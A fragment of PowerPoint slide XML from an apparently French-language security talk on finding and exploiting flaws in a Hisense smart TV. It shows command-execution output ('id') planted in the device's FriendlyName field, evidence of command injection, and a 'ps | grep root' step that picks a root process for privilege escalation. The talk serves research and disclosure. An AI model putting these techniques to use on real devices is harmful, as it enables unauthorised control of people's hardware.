              </a:rPr>
              <a:t>model_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Maximum : 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Description = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main_trunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>model_description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Maximum : 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ProductMaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hisense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"      # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       Maximum : 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Manufacturer = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hisense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"      # for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MStar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> launcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FriendlyName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=2910(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvmain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=2910(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvmain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) groups=2900(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svcmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),2901(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NetworkService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),2910(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvmain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),10002(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Netflix_Splash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),10009(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hisenseUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D56EC4-2526-C546-40AE-622A0DA45FAD}"/>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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0"/>
              <a:t>Recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC343630-6581-66B3-040B-0FF319F00159}"/>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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174751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E9302FB-2B8F-E771-B1F4-0EBC107A9178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F2B87DA-D238-858B-1134-25DE090DA137}"/>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9A51FEDE-C73D-E23D-E660-FEB5556D1188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Elévation de privilège</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08942701-2493-8DB0-4EBF-73770BEE9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029" y="1285875"/>
            <a:ext cx="4572000" cy="2571750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3618549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A3AF332-FC29-6405-5F85-27DBF8A0DB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E3ACC5-067A-7154-C445-3BD7748E699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8E443828-DCF6-3F8A-6067-0F91941D29D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Trouver un processus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>interessant</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E8C8F2-9EF1-E168-64B3-AFEA8A786676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1202363"/>
            <a:ext cx="8509659" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> –a | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> ‘root’</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD372E0-BAAD-206A-9CE2-CD7DCE44E97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539126" y="1979062"/>
            <a:ext cx="8161655" cy="1592744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1 root     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2 root     [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kthreadd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3 root     [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ksoftirqd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4 root     [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kworker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/0:0]</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1292 root     {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BigBang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} /applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bigbang ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>enable_no_root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svcmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> APPMGR ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>appmgr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> off -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> off –c /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.cfg</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E5D90E-ACE0-DF39-9718-2D72ACEBB536}"/>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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
